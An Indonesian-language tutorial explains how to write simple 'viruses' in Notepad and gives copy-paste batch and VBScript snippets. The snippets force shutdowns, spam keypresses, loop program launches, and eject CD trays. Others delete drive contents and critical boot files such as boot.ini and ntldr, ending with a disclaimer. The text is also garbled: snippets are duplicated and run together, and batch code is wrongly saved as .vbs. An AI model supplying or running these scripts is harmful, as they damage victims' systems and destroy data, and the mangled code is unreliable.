Dan virus akan merusak sistem perangkat lunak secara perlahan atau mungkin cepat dan jangan dikira tidak untuk perangkat keras jika komputer lo melakukan overprocess menyebabkan semua data dijalankan bersamaan dan itu bisa membuat kipas van laptop lu cepat hangus dantermal terbakar semua nya jika dihitung rupiah bernial 700ribuan hanya untuk kipas.
Cara Membuat Virus Komputer Dasar Dengan Notepad
1. Virus Untuk Membuat Komputer Shutdown [+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo off
msg * I'AM WATCHING YOU!
shutdown -c "Error Your PC is Load,.,.," -s\
[+] Lalu Save As beri nama homo1.vbs dan jangan lupa pilih jenis File (All Files)msg * I'AM WATCHING YOU!
shutdown -c "Error Your PC is Load,.,.," -s\
2. Virus Untuk Membuat Komputer Shutdown Dengan Timer
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo shutdown -s -t 2 -f
[+] Angka 2 adalah timernya silahkan ganti sesuka lu bray[+] Lalu Save As beri nama homo2.vbs dan jangan lupa pilih jenis File (All Files)
3. Virus Untuk Membuat Tombol Backspace Menekan Terus-Menerus "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
MsgBox "Balik Lagi Bos!"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop
[+] Lalu Save As beri nama homo3.vbs dan jangan lupa pilih jenis File (All Files)4. Virus Untuk Membuat Notepad Terbuka Secara Otomatis "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top
[+] Lalu Save As beri nama homo4.vbs dan jangan lupa pilih jenis File (All Files)5. Virus Untuk Membuat DVD/CD ROOM terbuka sendiri "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
[+] Lalu Save As beri nama homo5.vbs dan jangan lupa pilih jenis File (All Files)Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
6. Virus Untuk Memformat Hardisk
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo off
DEL C: -Y
DEL D: -Y
[+] Lalu Save As beri nama homo6.vbs dan jangan lupa pilih jenis File (All Files)DEL C: -Y
DEL D: -Y
[+] Resiko ditanggung pentester gue gak bertanggung jawab!
Bonus Tutorial Membuat Virus Ganas
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
[+] Lalu Save As beri nama homo1.bat dan jangan lupa pilih jenis File (All Files)del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
[+] Keterangan Untuk Script Code Diatas
- del c:\autoexec.bat = buat hapus autoexe.bat di direktori C
- del c:\boot.ini = buat hapus Boot.ini di direktori C
- del c:\ntldr = buat hapus ntldr
- del c:\windows\win.ini = untuk hapus file win.ini yang berlokasi di C:/windows
- attrib -r -s -h = untuk menampilkan file ke 4 windows tadi yang di supper hidden